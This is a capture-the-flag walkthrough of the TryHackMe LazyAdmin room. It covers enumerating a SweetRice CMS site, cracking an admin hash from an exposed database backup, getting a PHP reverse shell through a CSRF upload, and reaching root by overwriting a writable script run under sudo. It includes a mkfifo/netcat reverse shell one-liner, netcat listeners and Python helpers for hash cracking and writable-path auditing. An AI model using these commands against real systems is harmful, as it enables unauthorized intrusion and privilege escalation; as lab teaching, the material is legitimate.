Papadope Course

LazyAdmin - TryHackMe Walkthrough

A beginner-friendly boot2root machine focused on web enumeration, SweetRice CMS exploitation, reverse shell access, and privilege escalation through a writable script executed with elevated privileges.

Room URL: https://tryhackme.com/room/lazyadmin

Difficulty: Easy


Tools & Techniques Used

  • Nmap
  • Gobuster
  • Searchsploit
  • CrackStation / hash cracking (MD5)
  • CSRF + PHP code execution exploit (SweetRice)
  • Netcat (reverse shell listener)
  • Linux privilege escalation enumeration

Step-by-Step Walkthrough

1. Enumeration

Start with a full Nmap scan:

nmap -sC -sV -p- -oN nmap.txt <TARGET_IP>

Typical findings:

Port  Service  Notes
22    SSH      OpenSSH
80    HTTP     Apache default page

2. Web Enumeration

Browse to http://<TARGET_IP> and verify the default Apache page.

Enumerate directories:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt

Key discovery:

  • /content

Run Gobuster again on /content:

gobuster dir -u http://<TARGET_IP>/content -w /usr/share/wordlists/dirb/common.txt

Useful paths include:

  • /content/as (admin/login area)
  • /content/inc
  • /content/js/SweetRice.js

Inspect SweetRice.js and the /content/as login page: they identify the CMS as SweetRice. Confirm the exact version (1.5.1 in this room), because the public exploits below are version-specific.


3. Credential Discovery via Backup Disclosure

Search for public exploits:

searchsploit sweetrice

Searchsploit lists a backup disclosure issue for SweetRice 1.5.1: the CMS writes its MySQL backups into a directory under the web root, so anyone can read them without authentication:

/content/inc/mysql_backup/

Download the SQL backup and inspect it:

file mysql_backup_*.sql
cat mysql_backup_*.sql

The backup stores the CMS settings as a PHP-serialized string inside a SQL INSERT. The admin username and the MD5 password hash sit next to each other in that string (hash redacted here):

"admin";..."manager";..."passwd";""

Crack the hash (e.g., CrackStation or local cracking) to recover the admin password.
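The extraction and cracking step above, as an added example that is not part of the original walkthrough. The backup text below is a constructed sample that only mimics the serialized shape shown above (the hash is md5("password"), not the room's hash), the mini-wordlist stands in for rockyou.txt or CrackStation, and the function names are my own:

```python
import hashlib
import re
import sys

# Constructed sample modelled on the shape of a SweetRice mysql_backup dump:
# the CMS settings are a PHP-serialized array inside a SQL INSERT, with the
# admin username and MD5 password hash stored side by side. The hash here is
# md5("password"); it is NOT the room's real hash.
SAMPLE_BACKUP = r'''
INSERT INTO `%--%_options` VALUES('1','global_setting','a:3:{s:4:\"name\";s:12:\"Demo Website\";s:5:\"admin\";s:7:\"manager\";s:6:\"passwd\";s:32:\"5f4dcc3b5aa765d61d8327deb882cf99\";}','1575254922');
'''

# Constructed mini-wordlist standing in for rockyou.txt / CrackStation.
WORDLIST = ["123456", "admin", "letmein", "password", "Welcome1"]

# PHP serialization: s:<len>:"<value>"; inside a SQL dump the quotes are
# backslash-escaped, so each quote may be preceded by a backslash.
CRED_RE = re.compile(
    r's:5:\\?"admin\\?";s:\d+:\\?"(?P<user>[^"\\]+)\\?";'
    r's:6:\\?"passwd\\?";s:32:\\?"(?P<hash>[0-9a-fA-F]{32})\\?"'
)


def extract_credentials(backup_text):
    """Return every (username, md5_hex) pair found in the backup text."""
    return [(m.group("user"), m.group("hash").lower())
            for m in CRED_RE.finditer(backup_text)]


def crack_md5(md5_hex, wordlist):
    """Unsalted MD5 is a straight dictionary lookup: hash each candidate
    and compare. Returns the plaintext, or None if the wordlist misses."""
    target = md5_hex.lower()
    for candidate in wordlist:
        if hashlib.md5(candidate.encode("utf-8", "ignore")).hexdigest() == target:
            return candidate
    return None


def recover_admin_password(backup_text, wordlist):
    """Map each admin user in the backup to its cracked password (or None)."""
    return {user: crack_md5(h, wordlist) for user, h in extract_credentials(backup_text)}


if __name__ == "__main__":
    # Usage: python3 sweetrice_creds.py mysql_backup_<date>.sql [wordlist]
    backup = SAMPLE_BACKUP
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="ignore") as fh:
            backup = fh.read()
    words = WORDLIST
    if len(sys.argv) > 2:
        # Read the whole list once so a second hash can reuse it.
        with open(sys.argv[2], encoding="utf-8", errors="ignore") as fh:
            words = [line.rstrip("\n") for line in fh]
    for user, pw in recover_admin_password(backup, words).items():
        print(f"{user}: {pw if pw is not None else '<not cracked>'}")
```

Run it against the real dump with `python3 sweetrice_creds.py mysql_backup_*.sql /usr/share/wordlists/rockyou.txt`; a miss against a large list means the password is not a dictionary word and a rule-based cracker (hashcat mode 0) is the next step.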

Login page:

http://<TARGET_IP>/content/as/

4. Initial Access (PHP Code Execution)

Use the SweetRice CSRF/PHP code execution method (as documented in public exploit references).

Workflow:

  1. Log in as admin
  2. Trigger the CSRF payload (an HTML form submitted from the same browser session) to save an ad whose body is PHP; SweetRice writes it to /content/inc/ads/ as a .php file named after the ad
  3. First test with a harmless PHP payload (phpinfo())
  4. Replace with a reverse shell payload

Start listener:

nc -lvnp 4444

Trigger the uploaded shell by requesting it (replace the ad name with the one you chose in step 2):

http://<TARGET_IP>/content/inc/ads/<AD_NAME>.php

You should receive a shell on the target.


5. User Flag

Stabilize the shell if needed and retrieve the user flag:

cd /home/itguy
cat user.txt

6. Privilege Escalation

From the user home directory, inspect backup.pl. It is a short Perl wrapper that calls /etc/copy.sh.

The key finding is that /etc/copy.sh, the script backup.pl executes, is writable by your current user, while backup.pl itself can be run with elevated privileges (check with sudo -l).

Confirm permissions:

ls -la /etc/copy.sh

Overwrite the writable script with a reverse shell one-liner (use your own IP/port; this replaces the original contents of copy.sh):

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP> 7777 >/tmp/f' > /etc/copy.sh

Start listener:

nc -lvnp 7777

Run backup.pl through sudo exactly as sudo -l lists it (in this room, itguy may run /usr/bin/perl /home/itguy/backup.pl as root without a password). When backup.pl calls copy.sh, your listener receives a root shell.

Verify and grab root flag:

whoami
cat /root/root.txt
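The check behind this escalation generalizes: any script a privileged process executes is only as trustworthy as the files it calls, so the audit is "which absolute paths does this script reference, and can I write to any of them?". The following is an added example of that audit and is not code from the room or its author; the sample script is constructed to mirror the shape of backup.pl (a wrapper that shells out to a second script), the path regex is a heuristic, and `exists`/`access` are injectable so the logic can be tested without touching the real filesystem:

```python
import os
import re
import sys

# Constructed stand-in for a privileged wrapper script, shaped like the
# backup.pl in this room: it shells out to a second script by absolute path.
# Not the room's actual file contents.
SAMPLE_BACKUP_PL = r'''#!/usr/bin/perl
system("sh", "/etc/copy.sh");
'''

# Heuristic: an absolute path is a '/' that is not itself part of a path
# token, followed by one or more path components (trailing '/' dropped).
ABS_PATH_RE = re.compile(r'(?<![\w.-])/(?:[\w.-]+/)*[\w.-]+')


def referenced_paths(script_text):
    """Absolute paths mentioned in a script, in order of first appearance."""
    seen = []
    for m in ABS_PATH_RE.finditer(script_text):
        if m.group(0) not in seen:
            seen.append(m.group(0))
    return seen


def audit_script(script_text, exists=os.path.exists, access=os.access):
    """Map each referenced path that exists to whether the caller can write it.
    `exists` and `access` default to the real filesystem; pass fakes to test."""
    return {p: bool(access(p, os.W_OK))
            for p in referenced_paths(script_text) if exists(p)}


def writable_targets(report):
    """Paths from an audit report that the current user can overwrite: each one
    is a candidate for hijacking the privileged caller."""
    return sorted(p for p, writable in report.items() if writable)


if __name__ == "__main__":
    # Usage: python3 audit_deps.py /home/itguy/backup.pl
    # Pair with `sudo -l` to learn which scripts run with elevated privileges.
    text = SAMPLE_BACKUP_PL
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="ignore") as fh:
            text = fh.read()
    report = audit_script(text)
    for path, writable in report.items():
        print(f"{'WRITABLE' if writable else 'read-only'}  {path}")
    hits = writable_targets(report)
    print("hijack candidates:", ", ".join(hits) if hits else "none")
```

On the target, point it at backup.pl; a WRITABLE line for /etc/copy.sh is exactly the finding this section relies on. The same audit applies to cron jobs and sudo-allowed scripts on any Linux host, and a dependency that is writable but does not yet exist (a missing file on a writable directory path) is worth a manual look, since the heuristic only reports paths that exist.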

Notes

  • Keep writeups legal and only use these steps in authorized labs.
  • Key lessons:
    • Public exploit research + version detection is powerful.
    • Backup file exposure can leak credentials.
    • Writable scripts executed by privileged processes are critical privesc paths.